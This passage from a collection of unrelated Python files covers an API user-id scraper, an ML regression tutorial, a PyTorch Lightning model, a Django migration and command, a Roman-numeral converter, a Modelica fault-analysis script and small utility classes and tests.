        # NOTE(review): 435000 looks like an initial max-user-id guess and 9 a
        # concurrency setting -- confirm against DataSyncer's signature.
        self.dataSyncer = DataSyncer('https://api.bgm.tv/user/', User, 435000, 9)
    def calculate_incremental_scraping_range(self):
        """Return (start_id, end_id): the id range that still needs scraping.

        start is the largest user id already stored (at least 1); end is the
        maximum id currently reported by the API.
        """
        # get current user with maximum id in database
        current_max_id_user = self.dataSyncer.databaseExecutor.session \
            .query(User) \
            .order_by(User.id.desc()) \
            .first()
        # Empty table => start from 0 (clamped to 1 below).
        current_user_max_id = current_max_id_user.id \
            if current_max_id_user is not None else 0
        return max(1, current_user_max_id), self.dataSyncer.requestHandler.max_id
    def run(self):
        """Scrape only the id range that is new since the last sync."""
        max_db_id, max_api_id = self.calculate_incremental_scraping_range()
        if max_db_id < max_api_id:
            logger.info(
                'Current max user id:%s in database is smaller than max id:%s in API, starting syncing data from'
                ' %s to %s', max_db_id, max_api_id, max_db_id, max_api_id)
            # end is exclusive in start_scraper, hence the +1.
            self.dataSyncer.start_scraper(max_db_id, max_api_id + 1)
        else:
            logger.info(
                'Nothing to sync as there\'s no new user. Current max id in API :%s, max id in database: :%s',
                max_api_id, max_db_id)
if __name__ == "__main__":
    # Run the partial sync directly when executed as a script.
    UserPartialSyncer().run()
| nilq/baby-python | python |
import sys
import ui
if __name__ == "__main__":
    """Qt application entry point: build the generated UI and run the event loop."""
    app = ui.QtWidgets.QApplication(sys.argv)
    # Use distinct names for the window and the generated UI object: the
    # original rebound the name `ui` (shadowing the imported module), which
    # only worked by accident and breaks any later use of the module. Also
    # removed a dataset-dump artifact fused onto the sys.exit line.
    main_window = ui.QtWidgets.QMainWindow()
    main_ui = ui.Ui_MainWindow()
    main_ui.setupUi(main_window)
    main_window.show()
    sys.exit(app.exec_())
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
dataset = pd.read_csv("student_scores.csv")
# Dimensions of the dataset. (Fixed: removed a dataset-dump artifact fused
# onto the final print line; Turkish comments translated to English --
# user-facing strings are left untouched.)
dataShape = dataset.shape
print(dataShape)
print(dataset.head(7)) # shows the head of the dataset; default is 5 rows.
print(dataset.tail(7)) # shows the tail of the dataset; default is 5 rows.
# describe() gives summary statistics about the dataset.
print(dataset.describe())
print(dataset.columns) # names of the dataset columns.
X = dataset.iloc[:, :-1].values # "Hours" values
y = dataset.iloc[:, 1].values # "Scores" values
print(X)
print(y)
# Split the dataset into training and test parts.
# test_size=0.2 => 80% of the data for training, 20% for testing.
# random_state => fixes the shuffling so every run trains on the same split.
from sklearn.model_selection import train_test_split
Xtrain, Xtest, ytrain, ytest = train_test_split(X, y, test_size=0.2, random_state=0)
# Set up and fit the regression model.
from sklearn.linear_model import LinearRegression
reg = LinearRegression() # create the regression object
reg.fit(Xtrain,ytrain) # feed the prepared data to the model and train it.
print(reg.intercept_) # expected to be approximately 2.01816004143.
# Change in y for a one-unit increase in x: for this example a student can
# raise their score by this amount per extra hour of study.
print(reg.coef_)
### Making predictions
yPred = reg.predict(Xtest) ## predictions for the Xtest values
print(yPred)
# Put predictions in a DataFrame so they can be compared to the real values.
df = pd.DataFrame({"Gerçek Değer": ytest, "Tahmin Edilen değer": yPred})
print(df)
## Performance evaluation
from sklearn import metrics
# Mean Absolute Error (MAE): absolute difference between predicted and
# actual values.
maeScore = metrics.mean_absolute_error(ytest, yPred)
print("Ortalama Mutlak Hata = " + str(maeScore))
# Mean Squared Error (MSE): mean of the squared differences between the
# actual values and the predictions.
mseScore = metrics.mean_squared_error(ytest, yPred)
print("Ortalama Kare Hatası = " + str(mseScore))
# Root Mean Squared Error (RMSE).
rmseScore = np.sqrt(metrics.mean_squared_error(ytest, yPred))
print("RMSE = "+ str(rmseScore))
# Data visualization.
dataset.plot(x="Hours", y="Scores", style="go")
random_x = [1.1, 5.01, 9.2]
plt.plot(random_x,
         reg.intercept_ + reg.coef_ * random_x,
         color='red',
         label='regresyon grafiği')
plt.title("Saatlere Göre Yüzdelik Skorlar")
plt.xlabel("Çalışma Saatleri")
plt.ylabel("Yüzdelik Skorlar")
plt.savefig("Grafik.jpg")
plt.show()
## Predictions on values outside the dataset.
testVeri = np.array([0.5, 1.0, 4.2, 6.7, 10.0]).reshape(-1,1)
pred = reg.predict(testVeri)
for i in range(len(testVeri)):
    print(str(testVeri[i]) + "=>" + str(pred[i]) )
import os, sys
# Converts the "Epilepsy" multivariate time-series .arff files (TRAIN/TEST)
# into a flat whitespace-separated format, one row per time step:
#   <series-id> <time-index> <class-id> <var1> <var2> <var3>
variables_size = 3            # number of variables per multivariate series
dataset_name = "Epilepsy"
class_dictionary = {}         # maps raw class-label string -> integer id
class_count = 1               # next integer id to hand out
dirname = os.path.abspath(os.path.dirname(sys.argv[0]))
train_test_str = ["_TRAIN","_TEST"]
for i in range(0,2):
    arff_data_flag = 0        # becomes 1 once the "@data" marker has been seen
    series_count = 1
    file_location = dirname + "/" + dataset_name + train_test_str[i] + ".arff"
    with open(file_location) as fin:
        newfile_name = dataset_name + train_test_str[i] + "_FORMATED"
        with open(newfile_name, "w") as newfile:
            for line in fin:
                # Skip the ARFF header until "@data" is reached.
                if arff_data_flag == 0:
                    if line == "@data\n": #check for start of dataset values
                        arff_data_flag = 1
                    continue
                line = line.split(",")
                attribute_iterator = 0     # index of the variable currently being filled
                class_value = None
                ts_helper = []             # per-variable list of float values
                for j in range(0,variables_size):
                    ts_helper.append([])
                for j in range(0,len(line)):
                    # A literal "\n" escape inside a field separates two variables'
                    # value streams: the first half closes the current variable,
                    # the second half opens the next one.
                    if "\\n" in line[j]:
                        splitted_lines = line[j].split("\\n")
                        ts_helper[attribute_iterator].append(float(splitted_lines[0]))
                        attribute_iterator = attribute_iterator + 1
                        ts_helper[attribute_iterator].append(float(splitted_lines[1]))
                    elif j == (len(line)-1):
                        # Last comma-separated field is the class label; note it
                        # still carries its trailing newline, used consistently as key.
                        if line[j] in class_dictionary:
                            class_value = class_dictionary[line[j]]
                        else:
                            class_dictionary[line[j]] = class_count
                            class_value = class_count
                            class_count = class_count + 1
                    elif "'" in line[j]:
                        # Strip single-quote wrapping before parsing the number.
                        formated_value = line[j].replace("'","")
                        ts_helper[attribute_iterator].append(float(formated_value))
                    elif '"' in line[j]:
                        # Strip double-quote wrapping before parsing the number.
                        formated_value = line[j].replace('"',"")
                        ts_helper[attribute_iterator].append(float(formated_value))
                    else:
                        ts_helper[attribute_iterator].append(float(line[j]))
                # Emit one output row per time step across all variables.
                for j in range(0,len(ts_helper[0])):
                    line_to_write = ""
                    line_to_write += str(series_count) + " " + str(j+1) + " " + str(class_value)
                    for u in range(0,variables_size):
                        line_to_write += " " + str(ts_helper[u][j])
                    line_to_write += "\n"
                    newfile.write(line_to_write)
                series_count = series_count + 1
| nilq/baby-python | python |
from .AlgerianMobilePhoneNumber import AlgerianMobilePhoneNumber | nilq/baby-python | python |
from automl_infrastructure.experiment.observations import SimpleObservation
import numpy as np
class Std(SimpleObservation):
    """Observation that aggregates a list of fold scores into their
    (population) standard deviation."""

    def __init__(self, metric):
        super().__init__(metric)

    def agg_func(self, values):
        # Equivalent to np.std(values): population std (ddof=0) of the flat array.
        return np.asarray(values).std()
class Avg(SimpleObservation):
    """Observation that aggregates a list of fold scores into their
    arithmetic mean."""

    def __init__(self, metric):
        super().__init__(metric)

    def agg_func(self, values):
        # Equivalent to np.mean(values): arithmetic mean of the flat array.
        return np.asarray(values).mean()
| nilq/baby-python | python |
import torch
import torchvision.transforms as T
from pytorch_grad_cam import GradCAMPlusPlus
from pytorch_lightning import LightningModule
from pawpularity.augmentations import mixup
from . import efficientnet, levit_transformer, swin_transformers, vision_transformers, learnable_resizer
class Model(LightningModule):
    """LightningModule for Pawpularity score regression.

    Builds the backbone, loss, optimizer and LR scheduler from ``cfg``.
    Labels arrive on a 0-100 scale, are scaled to [0, 1] and trained
    against sigmoid logits; the logged epoch metric is RMSE back on the
    0-100 scale.
    """

    # Backbone registry, keyed by cfg.model_name.
    supported_models = {
        'EfficientNetV2Large': efficientnet.__dict__['EfficientNetV2Large'],
        'EfficientNetV2Medium': efficientnet.__dict__['EfficientNetV2Medium'],
        'EfficientNetV2Small': efficientnet.__dict__['EfficientNetV2Small'],
        'EfficientNetB0': efficientnet.__dict__['EfficientNetB0'],
        'EfficientNetB1': efficientnet.__dict__['EfficientNetB1'],
        'EfficientNetB2': efficientnet.__dict__['EfficientNetB2'],
        'EfficientNetB3': efficientnet.__dict__['EfficientNetB3'],
        'EfficientNetB4': efficientnet.__dict__['EfficientNetB4'],
        'EfficientNetB5': efficientnet.__dict__['EfficientNetB5'],
        'Levit': levit_transformer.__dict__['Levit'],
        'SwinLarge': swin_transformers.__dict__['SwinLarge'],
        'SwinLargev2': swin_transformers.__dict__['SwinLargev2'],
        'SwinSmall': swin_transformers.__dict__['SwinSmall'],
        'SwinTiny': swin_transformers.__dict__['SwinTiny'],
        'ViTTiny': vision_transformers.__dict__['ViTTiny'],
        'ViTTinyv2': vision_transformers.__dict__['ViTTinyv2'],
        'ViTSmall': vision_transformers.__dict__['ViTSmall'],
        'ViTSmallv2': vision_transformers.__dict__['ViTSmallv2'],
        'ViTLarge': vision_transformers.__dict__['ViTLarge'],
        'ViTLargev2': vision_transformers.__dict__['ViTLargev2'],
        'ViTHybridTiny': vision_transformers.__dict__['ViTHybridTiny'],
        'ViTHybridTinyv2': vision_transformers.__dict__['ViTHybridTinyv2'],
        'ViTHybridSmall': vision_transformers.__dict__['ViTHybridSmall'],
        'ViTHybridSmallv2': vision_transformers.__dict__['ViTHybridSmallv2'],
        'ViTHybridLarge': vision_transformers.__dict__['ViTHybridLarge'],
        'ViTHybridLargev2': vision_transformers.__dict__['ViTHybridLargev2'],
    }

    # Loss registry, keyed by cfg.loss.
    supported_loss = {
        'BCEWithLogitsLoss': torch.nn.BCEWithLogitsLoss
    }

    # Optimizer registry, keyed by cfg.optimizer['name'].
    supported_optimizers = {
        'Adam': torch.optim.Adam,
        'AdamW': torch.optim.AdamW
    }

    # Scheduler registry, keyed by cfg.scheduler['name'].
    supported_schedulers = {
        'CosineAnnealingWarmRestarts': torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
    }

    def __init__(self,
                 cfg):
        super().__init__()
        self.cfg = cfg
        self._build_model()
        self._build_criterion()
        # Persist the full config alongside checkpoints.
        self.save_hyperparameters(self.cfg.asdict)

    def _build_model(self):
        """Instantiate the backbone selected by ``cfg.model_name``."""
        if self.cfg.model_name not in self.supported_models:
            raise ValueError(
                f"{self.cfg.model_name} not supported, check your configuration")
        self.model = self.supported_models[self.cfg.model_name](self.cfg)

    def _build_criterion(self):
        """Instantiate the loss selected by ``cfg.loss``."""
        if self.cfg.loss not in self.supported_loss:
            raise ValueError(
                f"{self.cfg.loss} not supported, check your configuration")
        self.criterion = self.supported_loss[self.cfg.loss]()

    def _build_optimizer(self):
        """Instantiate the optimizer selected by ``cfg.optimizer['name']``."""
        if self.cfg.optimizer['name'] not in self.supported_optimizers:
            raise ValueError(
                f"{self.cfg.optimizer} not supported, check your configuration")
        self.optimizer = self.supported_optimizers[self.cfg.optimizer['name']](
            self.parameters(), **self.cfg.optimizer['params'])

    def _build_scheduler(self):
        """Instantiate the LR scheduler selected by ``cfg.scheduler['name']``."""
        if self.cfg.scheduler['name'] not in self.supported_schedulers:
            # BUG FIX: the error message previously echoed cfg.optimizer
            # (copy-paste), hiding the offending scheduler configuration.
            raise ValueError(
                f"{self.cfg.scheduler} not supported, check your configuration")
        self.scheduler = self.supported_schedulers[self.cfg.scheduler['name']](
            self.optimizer, **self.cfg.scheduler['params'])

    def forward(self, x):
        out = self.model(x)
        return out

    def training_step(self, batch, batch_idx):
        loss, pred, labels = self._share_step(batch, 'train')
        return {'loss': loss, 'pred': pred, 'labels': labels}

    def validation_step(self, batch, batch_idx):
        loss, pred, labels = self._share_step(batch, 'val')
        return {'loss': loss, 'pred': pred, 'labels': labels}

    def predict_step(self, batch, batch_idx, dataloader_idx=0):
        """Return percent-scale predictions plus backbone embeddings (numpy)."""
        images, _ = batch
        logits, embeddings = self.model(images, True)
        pred = logits.squeeze(1).sigmoid().detach().cpu().numpy() * 100.
        embeddings = embeddings.detach().cpu().numpy()
        return {'pred': pred, 'embeddings': embeddings}

    def _share_step(self, batch, mode):
        """Forward + loss shared by train/val.

        In train mode, mixup is applied with probability 0.5; the loss is
        then the lam-weighted sum of the two targets' losses.
        """
        images, labels = batch
        labels = labels.float() / 100.0
        if torch.rand(1)[0] < 0.5 and mode == 'train':
            mix_images, target_a, target_b, lam = mixup(
                images, labels, alpha=0.5)
            logits = self.forward(mix_images).squeeze(1)
            loss = self.criterion(logits, target_a) * lam + \
                (1 - lam) * self.criterion(logits, target_b)
        else:
            logits = self.forward(images).squeeze(1)
            loss = self.criterion(logits, labels)
        # Report predictions/labels back on the original 0-100 scale.
        pred = logits.sigmoid().detach().cpu() * 100.
        labels = labels.detach().cpu() * 100.
        return loss, pred, labels

    def training_epoch_end(self, outputs):
        self._share_epoch_end(outputs, 'train')

    def validation_epoch_end(self, outputs):
        self._share_epoch_end(outputs, 'val')

    def _share_epoch_end(self, outputs, mode):
        """Log the epoch-level RMSE over all step outputs as ``<mode>_loss``."""
        preds = []
        labels = []
        for out in outputs:
            pred, label = out['pred'], out['labels']
            preds.append(pred)
            labels.append(label)
        preds = torch.cat(preds)
        labels = torch.cat(labels)
        metrics = torch.sqrt(((labels - preds) ** 2).mean())
        self.log(f'{mode}_loss', metrics)

    def check_gradcam(self, dataloader, target_layer, target_category, reshape_transform=None):
        """Run Grad-CAM++ on one batch.

        Returns (denormalized images NHWC, grayscale CAMs, percent-scale
        predictions, labels).
        """
        inv_normalize = T.Normalize(mean=[-m/s for m, s in zip(self.cfg.image_mean, self.cfg.image_std)],
                                    std=[1/s for s in self.cfg.image_std])
        cam = GradCAMPlusPlus(
            model=self,
            target_layer=target_layer,
            use_cuda=self.cfg.trainer['gpus'],
            reshape_transform=reshape_transform)
        # BUG FIX: Python 3 iterators have no .next() method
        # (iter(dataloader).next() is Python-2 API); use next(...).
        org_images, labels = next(iter(dataloader))
        cam.batch_size = len(org_images)
        images = org_images.to(self.device)
        logits = self.forward(images).squeeze(1)
        pred = logits.sigmoid().detach().cpu().numpy() * 100
        labels = labels.cpu().numpy()
        grayscale_cam = cam(input_tensor=images,
                            target_category=target_category, eigen_smooth=True)
        org_images = inv_normalize(images)
        org_images = org_images.detach().cpu().numpy().transpose(0, 2, 3, 1)
        return org_images, grayscale_cam, pred, labels

    def configure_optimizers(self):
        self._build_optimizer()
        self._build_scheduler()
        return {"optimizer": self.optimizer, "lr_scheduler": self.scheduler}
class ResizerModel(LightningModule):
    """LightningModule wrapping the learnable image-resizer network.

    Builds the resizer, loss, optimizer and LR scheduler from ``cfg`` and
    logs the epoch-level MSE between predictions and targets.
    """

    supported_models = {
        'Resizer': learnable_resizer.__dict__['Resizer']
    }

    supported_loss = {
        'CrossEntropyLoss': torch.nn.CrossEntropyLoss,
        'MSE': torch.nn.MSELoss
    }

    supported_optimizers = {
        'Adam': torch.optim.Adam,
        'AdamW': torch.optim.AdamW
    }

    supported_schedulers = {
        'CosineAnnealingWarmRestarts': torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
    }

    def __init__(self,
                 cfg):
        super().__init__()
        self.cfg = cfg
        self._build_model()
        self._build_criterion()

    def _build_model(self):
        """Instantiate the resizer selected by ``cfg.model_name``."""
        if self.cfg.model_name not in self.supported_models:
            raise ValueError(
                f"{self.cfg.model_name} not supported, check your configuration")
        self.model = self.supported_models[self.cfg.model_name](self.cfg)

    def _build_criterion(self):
        """Instantiate the loss selected by ``cfg.loss``."""
        if self.cfg.loss not in self.supported_loss:
            raise ValueError(
                f"{self.cfg.loss} not supported, check your configuration")
        self.criterion = self.supported_loss[self.cfg.loss]()

    def _build_optimizer(self):
        """Instantiate the optimizer selected by ``cfg.optimizer['name']``."""
        if self.cfg.optimizer['name'] not in self.supported_optimizers:
            raise ValueError(
                f"{self.cfg.optimizer} not supported, check your configuration")
        self.optimizer = self.supported_optimizers[self.cfg.optimizer['name']](
            self.parameters(), **self.cfg.optimizer['params'])

    def _build_scheduler(self):
        """Instantiate the LR scheduler selected by ``cfg.scheduler['name']``."""
        if self.cfg.scheduler['name'] not in self.supported_schedulers:
            # BUG FIX: the error message previously echoed cfg.optimizer
            # (copy-paste), hiding the offending scheduler configuration.
            raise ValueError(
                f"{self.cfg.scheduler} not supported, check your configuration")
        self.scheduler = self.supported_schedulers[self.cfg.scheduler['name']](
            self.optimizer, **self.cfg.scheduler['params'])

    def forward(self, x):
        out = self.model(x)
        return out

    def training_step(self, batch, batch_idx):
        loss, pred, labels = self._share_step(batch, 'train')
        return {'loss': loss, 'pred': pred, 'labels': labels}

    def validation_step(self, batch, batch_idx):
        loss, pred, labels = self._share_step(batch, 'val')
        return {'loss': loss, 'pred': pred, 'labels': labels}

    def _share_step(self, batch, mode):
        """Forward + loss shared by train/val; detaches tensors for logging."""
        x, y = batch
        y_hat = self.model(x)
        loss = self.criterion(y_hat, y)
        y_hat = y_hat.detach().cpu()
        y = y.detach().cpu()
        return loss, y_hat, y

    def _share_epoch_end(self, outputs, mode):
        """Log the epoch-level MSE over all step outputs as ``<mode>_loss``."""
        preds = []
        labels = []
        for out in outputs:
            pred, label = out['pred'], out['labels']
            preds.append(pred)
            labels.append(label)
        preds = torch.cat(preds)
        labels = torch.cat(labels)
        metrics = ((labels - preds) ** 2).mean()
        self.log(f'{mode}_loss', metrics)

    def training_epoch_end(self, training_step_outputs):
        self._share_epoch_end(training_step_outputs, 'train')

    def validation_epoch_end(self, validation_step_outputs):
        self._share_epoch_end(validation_step_outputs, 'val')

    def configure_optimizers(self):
        self._build_optimizer()
        self._build_scheduler()
        return {"optimizer": self.optimizer, "lr_scheduler": self.scheduler}
| nilq/baby-python | python |
# Generated by Django 3.1.5 on 2021-04-29 10:53
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a boolean ``read`` flag (default False) to the notification model."""
    dependencies = [
        ('webpage', '0014_auto_20210428_0912'),
    ]
    operations = [
        migrations.AddField(
            model_name='notification',
            name='read',
            field=models.BooleanField(default=False),
        ),
    ]
| nilq/baby-python | python |
from __future__ import print_function
# Time: O(n)
# Space: O(1)
#
# Given a roman numeral, convert it to an integer.
#
# Input is guaranteed to be within the xrange from 1 to 3999.
#
class Solution:
    # @return an integer
    def romanToInt(self, s):
        """Convert a Roman numeral string to its integer value.

        Subtractive pairs (IV, IX, XL, ...) are handled by subtracting twice
        the previous symbol whenever a larger symbol follows a smaller one
        (the smaller one was already added once on the previous iteration).
        An empty string yields 0; input validity is not checked.
        """
        numeral_map = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}
        decimal = 0
        # BUG FIX: xrange is Python-2 only; range works on both 2 and 3
        # (the file already imports print_function for 2/3 compatibility).
        for i in range(len(s)):
            if i > 0 and numeral_map[s[i]] > numeral_map[s[i - 1]]:
                decimal += numeral_map[s[i]] - 2 * numeral_map[s[i - 1]]
            else:
                decimal += numeral_map[s[i]]
        return decimal
if __name__ == "__main__":
    # NOTE(review): "IIVX" is not a well-formed Roman numeral; the converter
    # does not validate input, it just applies the subtraction rule.
    print(Solution().romanToInt("IIVX"))
    print(Solution().romanToInt("MMMCMXCIX"))
| nilq/baby-python | python |
from mat_mult.mcm import memoized_mcm
def test_memo(test_cases):
    """Check memoized matrix-chain-multiplication costs against expectations."""
    for case in test_cases:
        expected_cost = case['cost']
        actual_cost = memoized_mcm(dims=case['dims'])[0]
        assert actual_cost == expected_cost
| nilq/baby-python | python |
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
import json
from django.core.management.base import BaseCommand, CommandError
from starthinker_ui.recipe.views import autoscale
from starthinker_ui.recipe.models import Recipe, utc_milliseconds, JOB_LOOKBACK_MS
class Command(BaseCommand):
    """Management command that prints autoscale status and recipe activity."""
    help = 'Autoscale workers.'
    def handle(self, *args, **kwargs):
        """Dump the autoscale JSON, then list overdue and recently-active recipes."""
        print(json.dumps(json.loads(autoscale(None).content), indent=2))
        # Active recipes whose scheduled job time has already passed (overdue).
        for recipe in Recipe.objects.filter(active=True, job_utm__lt=utc_milliseconds()).exclude(job_utm=0):
            print(recipe.id, recipe.name, recipe.get_days())
        print('---')
        # Active recipes a worker has touched within the lookback window (running).
        for recipe in Recipe.objects.filter(active=True, worker_utm__gte=utc_milliseconds() - JOB_LOOKBACK_MS):
            print(recipe.id, recipe.name, recipe.worker_uid)
| nilq/baby-python | python |
import torch
from change_detection_pytorch.encoders import get_encoder
if __name__ == '__main__':
    # Smoke test: push a random image through the mit-b0 encoder and
    # print the size of every returned feature map.
    dummy_input = torch.randn(1, 3, 256, 256)
    encoder = get_encoder('mit-b0', img_size=256)
    feature_maps = encoder(dummy_input)
    for feature_map in feature_maps:
        print(feature_map.size())
| nilq/baby-python | python |
# -*- Mode: Python -*-
#
# This file calls PARC_FAME_Toolkit and determine possible fault modes
# that exists in CyPhy Driveline Model.
import sys, os, traceback, json, shutil
from collections import OrderedDict
import fetch
script_dir = os.path.dirname(os.path.realpath(__file__))
output_dir = os.path.abspath(os.path.join(script_dir,"../"))
cyphy_model_dir = os.path.abspath(os.path.join(script_dir,"../CyPhy"))
# function to put the result into json format
def output(faultCount,output_dir):
    """Write FAME_Possible_Faults.testbench.json summarising the fault count.

    The file is written next to this script (``script_dir``); the
    ``output_dir`` argument is accepted but not used here.
    """
    # creating ordered dictionary to be outputted in testbench.json format
    data = OrderedDict()
    data["$id"] = "1"
    data["Name"] = "FAME_Possible_Faults"
    MetricDict = OrderedDict()
    MetricDict["$id"] = "2"
    # arbitrary placeholder used as the default requirement value
    MetricDict["Requirement"] = "1000"
    MetricDict["Name"] = "Possible_Faults"
    MetricDict["Unit"] = "count"
    MetricDict["Value"] = faultCount
    data["Metric"] = [MetricDict]
    with open(os.path.join(script_dir,'FAME_Possible_Faults.testbench.json'),'w') as outfile:
        json.dump(data,outfile, indent=2,sort_keys=False)
# quick bug fix for space in modelica folder name
# this is stripping the version number from Modelica library (if version is separated by space).
def set_library_dir():
    """Locate the Modelica library directory next to this script.

    Strips a space-separated version suffix from each library folder name
    (e.g. "Modelica 3.2" -> "Modelica") so the libraries can be loaded,
    then returns the directory path.  If the directory is missing, writes
    a _FAILED.txt marker and exits.
    """
    library_dir = os.path.join(script_dir,'../Libraries/')
    if os.path.exists(library_dir):
        for foldername in os.listdir(library_dir):
            try:
                # BUG FIX: the original compared the list itself to an int
                # (foldername.split(" ") > 1), which is always True under
                # Python 2's mixed-type ordering; we want the part count.
                if len(foldername.split(" ")) > 1:
                    os.rename(os.path.join(library_dir,foldername),os.path.join(library_dir,foldername.split()[0]))
            except WindowsError:
                # Rename target already exists: drop the stale copy and retry.
                shutil.rmtree(os.path.join(library_dir,foldername.split()[0]))
                os.rename(os.path.join(library_dir,foldername),os.path.join(library_dir,foldername.split()[0]))
    else:
        outfile = open("_FAILED.txt","w")
        outfile.write("Missing Modelica Library which should be in ../Libraries\n")
        outfile.close()
        sys.exit()
    return library_dir
def get_fame_toolbox_modelica_libraries():
    """Ensure the FAME, MSL and pre-faulted Modelica libraries are present.

    If any of the three directories beside this script is missing, all of
    them are removed and re-downloaded as one zip from the PARC deployment
    server (requires network access; ``fetch`` is a project-local helper).
    """
    flag = 1
    # check if any critical library is missing
    if (os.path.isdir(os.path.join(script_dir,"FAME")) and
        os.path.isdir(os.path.join(script_dir,"MSL")) and
        os.path.isdir(os.path.join(script_dir,"pre-faulted"))):
        flag = 0
    if flag == 1:
        # going redownload whole set of key libraries
        if os.path.exists(os.path.join(script_dir,"FAME")):
            shutil.rmtree(os.path.join(script_dir,"FAME"))
        if os.path.exists(os.path.join(script_dir,"MSL")):
            shutil.rmtree(os.path.join(script_dir,"MSL"))
        if os.path.exists(os.path.join(script_dir,"pre-faulted")):
            shutil.rmtree(os.path.join(script_dir,"pre-faulted"))
        fetch.fetch_and_unpack_zip_file("http://fame-deploy.parc.com/C2M2L_Decl/fault-enabled-libraries/FAME_Toolkit_Modelica_Files.zip", script_dir)
        shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","FAME"),
                    os.path.join(script_dir,"FAME"))
        shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","MSL"),
                    os.path.join(script_dir,"MSL"))
        shutil.move(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files","pre-faulted"),
                    os.path.join(script_dir,"pre-faulted"))
        shutil.rmtree(os.path.join(script_dir,"FAME_Toolkit_Modelica_Files"))
def get_testbench_name():
    """Read the CyPhy testbench name from model_config.json.

    Returns the "model_name" entry.  Uses a context manager so the file
    handle is always closed (the original leaked the open file object).
    """
    with open(os.path.join(cyphy_model_dir,"model_config.json")) as model_raw_data:
        model_json = json.load(model_raw_data)
    return model_json["model_name"]
try:
    import PARC_FAME_Toolkit
    library_dir = set_library_dir()
    # finding testbench name from json file that CyPhy created.
    testbench_name = get_testbench_name()
    # finding all the necessary model library to run testbench
    """
    # This approach failed because Postprocessing folder, which is not Modelica package
    # was in CyPhy folder.
    model_libraries = [cyphy_model_dir]
    for directory in os.listdir(cyphy_model_dir):
        if os.path.isdir(os.path.join(cyphy_model_dir,directory)):
            model_libraries.append(os.path.abspath(os.path.join(cyphy_model_dir,directory)))
    """
    model_libraries = [os.path.abspath(os.path.join(script_dir,"../CyPhy/"))]
    for directory in os.listdir(library_dir):
        if os.path.isdir(os.path.join(library_dir,directory)):
            model_libraries.append(os.path.abspath(os.path.join(library_dir,directory)))
    # NOTE(review): Python 2 print statement -- this script is Python 2 only.
    print model_libraries
    get_fame_toolbox_modelica_libraries()
    results = PARC_FAME_Toolkit.fault_analyze_testbench(
        testbench_name, model_libraries)
except:
    # Broad except by design: any failure (import, IO, analysis) is reported
    # to stderr but not re-raised.
    sys.stderr.write("Can't list faults:\n%s\n" % traceback.format_exc())
    # more complicated error handling can be added here, if desired
else:
    # now render it as JSON
    with open(os.path.join(script_dir,'possibleFault.json'),'w') as outfile:
        jsondata = json.dumps(results, indent=4)
        outfile.write(jsondata)
    # Count fault modes across all components; entries without "modes" are skipped.
    faultCnt = 0
    for i in range(len(results)):
        try:
            faultCnt = faultCnt + len(results[i]["modes"])
        except:
            pass
    output(faultCnt,output_dir)
    # Propagate the count into testbench_manifest.json under whichever
    # metric name this testbench uses, and mark it executed.
    if faultCnt > 0:
        keyfilename = "testbench_manifest.json"
        keyfile = os.path.join(output_dir,keyfilename)
        with open(keyfile,"r") as infile:
            jsondata = json.load(infile, object_pairs_hook=OrderedDict)
        for i in range(len(jsondata["Metrics"])):
            if jsondata["Metrics"][i]["Name"] == "NumPossFaults":
                jsondata["Metrics"][i]["Value"] = str(faultCnt)
                jsondata["Status"] = "EXECUTED"
            if jsondata["Metrics"][i]["Name"] == "NumPossibleFaults":
                jsondata["Metrics"][i]["Value"] = str(faultCnt)
                jsondata["Status"] = "EXECUTED"
            if jsondata["Metrics"][i]["Name"] == "Number_Faults":
                jsondata["Metrics"][i]["Value"] = str(faultCnt)
                jsondata["Status"] = "EXECUTED"
        with open(keyfile,"w") as outfile:
            json.dump(jsondata,outfile, indent=4)
| nilq/baby-python | python |
import logging
from openpyxl import load_workbook, Workbook
from openpyxl.utils.exceptions import InvalidFileException
class XLSXWorkbook:
    """Thin wrapper around an openpyxl workbook identified by its file path.

    Assigning to ``filename`` saves the previously loaded workbook (when
    dirty) and then loads the new file.
    """
    def __init__(self, filename: str):
        # Delegates to the property setter below, which loads the workbook.
        self.filename = filename
    @property
    def filename(self):
        return self.__filename
    @filename.setter
    def filename(self, filename: str, discard: bool = False):
        # NOTE(review): a property setter is always invoked with exactly one
        # value, so ``discard`` can never be supplied by callers -- it is
        # always False here.
        if not discard: # save modified content back to the excel if needed
            try:
                if self.__workbook is not None and self.__dirty:
                    self.__workbook.save(self.filename)
            except AttributeError:
                # First assignment: __workbook/__dirty do not exist yet.
                pass
        # open the new excel
        try:
            self.__workbook = load_workbook(filename)
        except InvalidFileException as e:
            logging.error(f'Failed to open excel file (unknown): {e}')
            # NOTE(review): on failure __filename is never assigned, so the
            # ``filename`` getter will raise AttributeError afterwards.
            self.__workbook = None
        else:
            self.__filename = filename
        finally:
            self.__dirty = False
    @property
    def sheet_names(self) -> list:
        # Returns None (not an empty list) when no workbook is loaded.
        if self.__workbook is not None:
            return self.__workbook.sheetnames
        return None
if __name__ == '__main__':
    # Smoke test: relies on a dataset checked out relative to this file.
    workbook = XLSXWorkbook('../../../../dataset/bentre/So Lieu Man Ben Tre 2018.xlsx')
    print(workbook.sheet_names)
| nilq/baby-python | python |
from __future__ import annotations
from unittest import TestCase
from tests.classes.simple_book import SimpleBook
from tests.classes.simple_deadline import SimpleDeadline
class TestUpdate(TestCase):
    """Tests for the model ``update`` method: bulk-assigns values, chains,
    skips transforms, and validates keys (snake_case only, allowed fields
    only)."""
    def test_update_without_arguments_wont_change_anything(self):
        book = SimpleBook(name='Thao Bvê', published=False)
        book.update()
        self.assertEqual(book._data_dict,
                         {'name': 'Thao Bvê', 'published': False})
    def test_update_with_keyed_arguments_updates_value(self):
        book = SimpleBook(name='Thao Bvê', published=False)
        book.update(name='Thao Boê')
        self.assertEqual(book._data_dict,
